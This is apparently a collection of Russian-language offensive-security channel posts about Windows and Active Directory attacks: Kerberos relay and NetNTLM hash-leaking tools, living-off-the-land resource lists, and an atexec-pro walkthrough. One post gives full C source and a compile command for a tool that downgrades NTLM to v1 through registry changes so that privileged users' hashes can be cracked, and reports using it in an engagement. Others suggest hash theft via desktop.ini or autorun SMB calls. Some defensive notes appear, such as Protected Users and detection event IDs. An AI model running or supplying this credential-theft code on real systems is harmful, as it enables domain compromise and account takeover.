Veeam красавцы, один jwt secret на всех. И это они заботятся о сохранности наших данных:)))
Техническое описание: https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/

Всем доброго вторника! Помните, друзья, как круто было, когда вышел KrbRelay , a за ним KrbrelayUp? Казалось, что в тот день эксплуатация AD перевернулась с ног на голову. Или с головы на ноги.... :)) Не суть!)

Недавно я выкладывал статью, в которой постарался максимально просто описать процесс ретрансляции керберос аутентификации. Но ещё раньше появились интересные атаки: CertifiedDCOM и SilverPotato . Была лишь одна проблема - нет POCов. А что делают студенты, когда нет POCов? Правильно! Их пишут :))

Поэтому хочу вам с радостью представить тулзу RemoteKrbRelay, которая не просто совмещает в себе и SilverPotato и CertifiedDCOM, а является полноценным фреймворком для обнаружения уязвимых DCOM-обьектов!

Я добавил чекер, который выводит абсолютно всю информацию о DCOM-объектах системы в удобно читаемом виде (csv / xlsx). Помимо этого, присутствует встроенный функционал кросс-сессионной активации.

Представляете? Есть два компьютера. На одном вы, а на втором ДА. И вы можете со своего компьютера триггерить керберос аутентификацию ДА, абсолютно удаленно!) 🙂

Что ж, отмечу, что это лишь minimal POC и ему ещё есть куда расти :) Например, я пока не допилил функционал по релею керберос аутентификации из OXID Initial Resolution Request (а там вообще-то RPC_C_IMP_LEVEL_IMPERSONATE🤫). Впрочем, я готов принимать PR :))

При всем уважении, этому уже много лет... Джеты зачем же так. Не обязательно vm, просто нужно быть ..... чтобы оставить скрипт восстановления в корне..я так лился лет 5 назад, коллеги не дадут соврать, оно есть в словарях для фазинга веба.. https://jetcsirt.su/bulletins-page/kritichnaya-uyazvimost-v-1c-bitriks-virtualnaya-mashina-vmbitrix-/

Давно хотел написать, но чет забывал.
Уважаемые вендоры поибэ моей прекрасной Родины, я не раз отдавал вам rce в ваших инфраструктурах, данные клиентов, бывало даже дампы доменов. Время идёт, опыт показывает, что мало что меняется. Займитесь уже наконец-то внутренней безопасностью, у вас есть крутые кадры, только почему-то пентест вы своими силами своей же инфраструктуры не можете сделать. Весь рынок вы учите как строить иб, но у себя вы его так же почему то построить не можете. И т.д.

А я мля... говорил🙈 ушатали аванпост в хвост и гриву

Всем привет! В продолжение темы про NetNTLM-хешики, кражу сессий и эксплойты :))

Тут на днях вышел FakePotato, который пофиксил один супер интересный вектор повышения привилегий - через установку обоев.

Ранее у ncc group выходила крутая статья про то, как изменение обоев может привести к утечке NetNTLM-хеша. Там было достаточно много требований, ограничивающих атаку: Webdav Redirector, DNS-запись....

Однако decoder.cloud достаточно прозрачно намекнул, что нашел функционал, позволяющий изменить обои привилегированного пользователя с использованием специального COM-объекта.

"I played with the Desktop Wallpaper and was able to change the desktop background image of Adminstrator"

Поэтому приходится вскрывать карты :)

Я выложил инструмент LeakedWallpaper , который позволяет получить NetNTLM-хеши ЛЮБОГО пользователя, чья сессия присутствует на хосте. Требования по правам: любые.

Способ до установки июньского фикса KB5040434 будет работать безотказно.

Демо можно найти тут

Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin. С правами local admin вы можете с помощью манипуляции ключами реестра сделать downgrade NTLM аутентификации до NetNTLMv1 и получить уже хеш, который можно восстановить в NTLM хеш в независимости от сложности пароля пользователя. Для этой цели я написал небольшую программу, которая бэкапит текущие настройки реестра, затем делает downgrade и через 60 сек восстанавливает все обратно.

#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep

void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
    HKEY hKey;
    DWORD value;
    DWORD valueSize = sizeof(DWORD);

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
        RegCloseKey(hKey);
        *oldValue = value;
    } else {
        printf("Ошибка чтения ключа реестра.\n");
    }
}

void SetRegKey(const char* path, const char* key, DWORD newValue) {
    HKEY hKey;

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
        RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
        RegCloseKey(hKey);
    } else {
        printf("Ошибка записи ключа реестра.\n");
    }
}

void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}

void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}

int main() {
    DWORD oldValue_LMCompatibilityLevel = 0;
    DWORD oldValue_NtlmMinClientSec = 0;
    DWORD oldValue_RestrictSendingNTLMTraffic = 0;

    ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);

    // Задержка 60 секунд
    sleep(60);

    NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);

    return 0;
}

Компилируем так

x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c

В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.

Если у нас есть права локального администратора... и мы хотим ntlm доменного пользователя который зайдет в интерактиве..
то можно упороться в его автозагрузку с вызовом smb соединения к нашему серверу, либо создать у него на рабочем столе папку с desktop.ini, который будет грузить иконку с нашего SMB сервера. Короче вариантов украсть сессию/хэш на обмазанном антивирусами и edrами устройстве очень много.
А с вариантом выше, оно становится еще и интереснее, ибо можем получить в конечном итоге ntlm хэш пользователя.
как напоминание: https://github.com/Gl3bGl4z/All_NTLM_leak

Всем привет) давно хотел начать вести в паблике какой-нибудь проект, и вот решил сейчас модно писать публичный С2. Идей много, что из этого получится, пока не знаю... может так ничего и не выйдет, а вдруг будет (надеюсь) как с Empire - его кто-то начнет дописывать.

Так как софт будет публичный, а я не особо программист, то буду рад помощи не только в рефакторинге кодовой базы, написании модулей, расширений, но и к идеям для улучшений. Например, дизайн, алгоритмы, поиск багов, да и просто указать на востребованность какого-то функционала.

Теперь обращаюсь к тем, кто хочет поучаствовать, а также кому просто интересно следить за проектом. Вот канал и группа(по ссылке)... Спама на канале будет много: размышления, опросы и т.п.

Всем привет, в связи с тем что последнее время приходится часто пентестить FreeIPA мы начали разрабатывать либу по типу impacket заточенную под особенности ипы. Пока начали реализовывать kerberos и написали пок для CVE-2024-3183. Если у кого-то будет желание как-то помочь в разработке - welcome.

https://github.com/c2micro/ipapocket

неплохой такой weakpass3 )) .....а не пароль

Living Off the Living Off the Land

Сборник всех сайтов, которые посвящены "жизни за счет земли" или процессу, суть которого — заиспользовать легитимные ресурсы, чтобы особо не палиться и злоупотребить ими.

О GTFOBins и LOLBAS вы уже наверняка все знаете, но возможности выходят далеко за их пределы. Все, что перечислено ниже, можно использовать в своих атаках, — вполне успешно и скрытно.

Классический LoTL:
— LOLBAS project — Windows
— GTFOBins — Linux
— LOOBins — MacOS

Extended LoTL:
— LOLAPPS — LoTL для 3th-party приложений, таких как VS Code и Discord
— Living Off The Land Drivers — драйвера для обхода средств безопасности и проведения атак
— LOTP — неочевидный RCE-By-Design в CLI-утилитах для разработки
— HijackLibs — проверенный список кандидатов для DLL Hijacking

Администрирование и виртуализация:
— LOLRMM — утилиты удаленного мониторинга и управления
— LOLESXi — скрипты и бинари из VMware ESXi
— LOFL — тактика, позволяющая не запускать бинари на скомпрометированных машинах, о которой я писал тут

Проекты от mrd0x:
— LOTS Project — легитимные сайты для фишинга и эксфильтрации
— MalAPI.io — список WinAPI-функций для Enumeration/Injection/Evasion
— FILESEC.IO — все типы файлов, которые могут быть полезны при атаках

Blue Team:
— WTFBin — GTFOBins и LOLBAS, но для синей команды и написания правил обнаружения
— bootloaders.io — курируемый список известных бутлоадеров
— LoLCerts — фингерпринты ликнутых сертификатов для подписи приложений, которые когда-либо утекали у крупных вендоров
— LOLBins CTI-Driven — наглядный MindMap с APT и компаниями, в которых участвовали те или иные бины

Другое:
— persistence-info — полусотня способов закрепиться в Windows
— LOTHardware — "железо", которое можно использовать для Red Team
— BYOL — пару слов о LoTL от Mandiant
— WADComs — интерактивная шпаргалка с готовыми командами для атак на AD

жизная жиза

листая старенький айпад наткнулся я на цены flipper zero.
Честно сказать, я слегка удивился стоимости 30к за этот девайс.
Вспомнилось мне, что без дела и абсолютно не интересный мне флиппер лежит в шкафу.
Собственно вот, отдам флиппер (чуть чуть поцарапался пластик над экраном) в хорошие руки с пересылкой по РФ тому кто назовёт максимальное количество рабочих утилит и сервисов для туннелинга (ngrok, zrok, chisel и тд).
Писать в бота @flipper_zer0_bot
форматом:
название - линк

итоги подведу 18 ноября. 😜

P.S. не нужно отправлять результаты работы нейронок))) еще и с нерабочими линками

Конкурс закончен, Artur Lukianov отпишите в личку.
Кто то присылал все что можно было получить через chatgpt, не проверяя что шлет....

В этом посте кратко познакомимся с инструментом atexec-pro (https://github.com/Ridter/atexec-pro). Позволяет выполнять команды (в том числе powershell), загружать-скачивать файлы и выполнять .NET в памяти. Для последних трех ограничение в размере - 1 МБ.

Atexec-pro под капотом использует сервис TSCH против привычного ATSVC и работает через TCP (т.е. пайпы не используем). На мой взгляд примечательно то, что в своей работе он файловую систему практически не трогает (кроме создания самой таски), но при этом позволяет получать нам вывод. Обычно подобные инструменты для этих целей используют промежуточный файл на диске, который затем удаляют (atexec, smbexec, wmiexec). AtExec-pro же для хранения вывода команды использует описание задачи :)

Давайте разберем принцип выполнения отдельной произвольной команды в этом инструменте:
1) Формируются рандомное имя задачи (состоит из 8 символов [A-Za-z]) и рандомный ключ
2) Команда, которую мы хотим исполнить шифруется этим ключом (AES) и в дальнейшем будет записана в описание задачи, думаю этим и вызван максимальный размер.
3) Далее берется шаблон PS скрипта, в нём мы указываем ключ из шага 1, который предварительно конвертировали в base64, и указываем имя задачи. В случае обычной команды это будет https://github.com/Ridter/atexec-pro/blob/main/libs/powershells/cmd.ps1. Сам скрипт по имени задачи дергает описание, расшифровывает его, выполняет команду и далее обновляет описание с выводом этой команды.
4) Далее полученный PS скрипт переводим в base64. Этот скрипт будем выполнять в самой задаче при выполнении через powershell -enc.
5) Создаём задачу и запускаем её.
6) Далее в цикле дергаем задачу, ждём её остановки и забираем результат.
7) Удаляем задачу.

Что в итоге имеем на хосте?

Событие 4698 на создание задачи (будет в Action команда powershell.exe -NonInteractive -enc <...>)
События 4688 на запуск процесса
Событие 4104 на выполнение скрипта powershell
Событие 4702 на обновление задачи после выполнения команды (запись вывода)
Событие 4699 на удаление задачи

Наибольшую ценность в плане детекта имеют события 4698 и 4104.
4698 содержит описание созданной задачи, в ней мы можем зацепиться за фиксированное для atexec и atexec-pro строку <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> в поле TaskContent.
4104 в данном случае будет содержать переведенную из Base64 строку (то есть не обфусцированную), именно в ней можно увидеть ранее рассмотренный выше шаблон с заполненными полями. 4104 включается через Script Block Logging, если явно он не включен, то будет логироваться через AMSI (будет логировать только подозрительные на своё усмотрение в журнал Powershell/Operational). На основе этого события можно надергать ключевых элементов для детекта из поля noscript_block_text.

Если у вас используются RPC-фильтры, то действуем аналогично SCShell (https://news.1rj.ru/str/beaverdreamer/169), в данном случае у сервиса UUID 86D35949-83C9-4044-B424-DB363231FD0C.


#rpc #atexec #schtasks